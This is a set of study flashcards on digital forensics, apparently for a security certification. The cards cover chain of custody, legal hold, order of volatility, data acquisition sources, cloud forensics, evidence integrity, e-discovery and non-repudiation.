4.5 Digital Forensics Flashcards
The application of science to the identification, collection, examination, and analysis, of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.
• Collect and protect information relating to an intrusion
– Many different data sources and protection
mechanisms
• RFC 3227 - Guidelines for
– Evidence Collection and Archiving
– A good set of best practices
• Standard digital forensic process
– Acquisition, analysis, and reporting
• Must be detail oriented
– Take extensive notes
Digital forensics
an internal process that an organization undergoes to preserve all data that might relate to a legal action involving the organization.
• A legal technique to preserve relevant information
– Prepare for impending litigation
– Initiated by legal counsel
• Hold notification
– Records custodians are instructed to preserve data
• Separate repository for electronically stored
information (ESI)
– Many different data sources and types
– Unique workflow and retention requirements
• Ongoing preservation
– Once notified, there’s an ongoing obligation to
preserve data
Legal hold
• A moving record of the event
– Gathers information external to the computer
and network
• Captures the status of the screen and other
volatile information
– Today’s mobile video devices are remarkable
• Don’t forget security cameras and your phone
• The video content must also be archived
– May have some of the most important record
of information
Capture video
• Not all data can be used in a court of law
– Different rules in different jurisdictions
• Legal authorization
– Search and seizure of information
• Procedures and tools
– The correct tools used the correct way
• Laboratories
– Proper scientific principles used to analyze
the evidence
• Technical and academic qualifications
– Competence and qualifications of experts
Admissibility
capable of being allowed or conceded : permissible evidence legally admissible in court. • Control evidence – Maintain integrity • Everyone who contacts the evidence – Use hashes – Avoid tampering • Label and catalog everything – Digitally tag all items for ongoing documentation – Seal and store
Chain of custody
• The time zone determines how the time is displayed
– Document the local device settings
• Different file systems store timestamps* differently
– FAT: Time is stored in local time
– NTFS: Time is stored in GMT
• Record the time offset from the operating system
– The Windows Registry
– Many different values (daylight saving time,
time change information, etc.)
Recording time offsets
give an audit trail that records user events on a PC and is a potential source of evidence in forensic examinations. • System logs – Documents important operating system and application events • Export and store for future reference – Filter and parse • Log store – Linux: /var/log – Windows: Event Viewer
Event logs
• Who might have seen this? – You won’t know until you ask • Interview and document – These folks might not be around later • Not all witness statements are 100% accurate – Humans are fallible
Interviews
• Document the findings
– For Internal use, legal proceedings, etc.
• Summary information
– Overview of the security event
• Detailed explanation of data acquisition
– Step-by-step method of the process
• The findings
– An analysis of the data
• Conclusion
– Professional results, given the analysis
Reports
Forensics Data Acquisition -
• How long does data stick around?
– Some media is much more volatile than others
– Gather data in order from the most volatile to
less volatile
Order of volatility
Forensics Data Acquisition - • Copy everything on a storage drive – Hard drive, SSD, flash drive • Drive image preparation – Power down to prevent changes – Remove storage drive • Connect to imaging device – With write-protection • Forensic clone – Bit-for-bit copy – Preserve all data (even the “deleted” data)
Disk
Forensics Data Acquisition - short term memory where data is stored as the processor needs it. a form of computer memory that can be read and changed in any order, typically used to store working data and machine code. • A difficult target to capture – Changes constantly – Capturing data changes the data • Memory dump – Grab everything in active RAM – Many third-party tools • Important data – Browsing history – Clipboard information – Encryption keys – Command history
Random access memory (RAM)
Forensics Data Acquisition -
space on a hard drive used as a temporary location to store information when RAM is fully utilized. Using a [this], a computer can use more memory than what is physically installed in the computer.
• Used by different operating systems
– Slightly different usage in each
• A place to store RAM when memory is depleted
– There’s a lot more space on the storage drive
– Transfer pages of RAM to a storage drive
• Can also contain portions of an application
– Page out portions that aren’t in use
• Contains data similar to a RAM dump
– Anything active on the system
Swap/pagefile
Forensics Data Acquisition -
• OS files and data – May have been modified • Core operating system – Executable files and libraries – Can be compared later to known-good files – Usually captured with a drive image • Other OS data – Logged in users – Open ports – Processes currently running – Attached device list
Operating system
Forensics Data Acquisition -
• Mobile devices and tablets – A more challenging forensics task • Capture data – Use an existing backup file – Transfer image over USB • Data – Phone calls – Contact information – Text messages – Email data – Images and movies
Device
Forensics Data Acquisition -
• Extract the device firmware – Rootkits and exploited hardware device – A reprogrammed firmware or ROM • Specific to the platform – Firmware implementations vary widely • Attacker gains access to the device – Maintains access through OS updates • Data discovery – Exploit data – Firmware functionality – Real-time data
Firmware
Forensics Data Acquisition -
• Generally associated with virtual machines (VMs)
– A point-in-time system image
• Incremental between snapshots
– Original image is the full backup
– Each snapshot is incremented from the last
– Restoring requires the original and all snapshots
• Contains all files and information about a VM
– Similar to a system image
– Operating system, applications, user data, etc.
Snapshot
Forensics Data Acquisition -
• Store data for use later
– Often used to increase performance
– Many different caches (CPU, disk, Internet, etc.)
• Can contain specialized data
– CPU cache is very short-term instruction storage
• Some data may never be used
– Erased after a specified timeframe or when the cache is full
– Browser caches are often long-lived
• Data
– URL locations
– Browser page components (text, images)
Cache
Forensics Data Acquisition -
• Gather information about and from the network – Network connections, packet captures • Inbound and outbound sessions – OS and application traffic • Packet data – Capture raw network data – May include long-term packet captures • Third-party packet captures – Firewalls, IPS, etc.
Network
Forensics Data Acquisition -
• Digital items left behind – Every contact leaves a trace – May not be obvious to access • Artifact locations – Log information – Flash memory – Prefetch cache files – Recycle Bin – Browser bookmarks and logins
Artifacts
On-Premises vs. Cloud Forensics -
• Adding complexity to the digital forensics process
– Cloud technologies
• Technical challenges
– Devices are not totally in your control
– There may be limited access
– Associate data with a specific user
• Legal issues
– Laws are different around the world
– The rules may not be immediately obvious
Forensics in the cloud
On-Premises vs. Cloud Forensics -
• Common to work with business partners
– Data sharing
– Outsourcing
• Cloud computing providers
– Can hold all of the data
– Manage Internet access
– Are they secure?
• Right-to-audit should be in the contract
– A legal agreement to have the option to perform
a security audit at any time
– Everyone agrees to the terms and conditions
– Ability to verify security before a breach occurs
Right to audit clauses
On-Premises vs. Cloud Forensics -
• Cloud computing technology appeared relatively quickly
– The legal world is scrambling to catch up
• Forensics professionals must know their legal rights
– Data in a different jurisdiction may be bound by very
different regulations
• Data stored in cloud may not be located in the same country
– Location of the data center may determine how data can
be treated
• Location of the data is critical
– Legal frameworks vary widely between countries
– Some countries don’t allow electronic searches outside
of their borders
Regulatory/jurisdiction
On-Premises vs. Cloud Forensics -
• Notification laws
– If consumer data is breached, the consumer must be
informed
• Many data breach notification laws
– Vary widely across countries and localities
– If you’re in the cloud, you’re a global entity
• Notification requirements also vary
– Type of data breached
– Who gets notified
– How quickly
Data breach notification laws
Managing Evidence -
• Hashing – Cryptographic integrity verification – A digital “fingerprint” • Checksums – Protects against accidental changes during transmission – A relatively simple integrity check – Not designed to replace a hash • Provenance – Documentation of authenticity – A chain of custody for data handling – Blockchain technology
Integrity
Managing Evidence -
• Handling evidence
– Isolate and protect the data
– Analyze the data later without any alterations
• Manage the collection process
– Work from copies
– Manage the data collection from mobile devices
• Live collection has become an important skill
– Data may be encrypted or difficult to collect after
powering down
• Follow best practices to ensure admissibility of
data in court
– What happens now affects the future
Preservation
Managing Evidence -
• [this]
– Collect, prepare, review, interpret, and produce
electronic documents
• E-discovery gathers data required by the legal process
– Does not generally involve analysis
– There’s no consideration of intent
• Works together with digital forensics
– The e-discovery process obtains a storage drive
– Data on the drive is smaller than expected
– Forensics experts determine that data was deleted and
attempt to recover the data
E-discovery (Electronic discovery)
Managing Evidence -
• Extract missing data without affecting the integrity of the data – Requires training and expertise • The recovery process can vary – Deleted files – Hidden data – Hardware or software corruption – Storage device is physically damaged
Data recovery
Managing Evidence -
• Proof of data integrity and the origin of the data
– The data is unchanged and really did come from the
sender
– Hashing the data
• Authentication that is genuine with high confidence
– The only person who could have sent the data is the
sender
• Message Authentication Code (MAC)
– The two parties can verify non-repudiation
• Digital Signature
– The non-repudiation can be publicly verified
Non-repudiation
Managing Evidence -
• [this(a)]
– A focus on key threat activity for a domain
– Business sectors, geographical regions, countries
– Gather information from internal threat reports,
third-party data sources, and other data inputs
– Determine the threat landscape based on the trends
• [this(b)]
– Prevent hostile intelligence operations
– Discover and disrupt foreign intelligence threats
– Gather threat information on foreign intelligence
operations
(a) Strategic intelligence / (b) counterintelligence
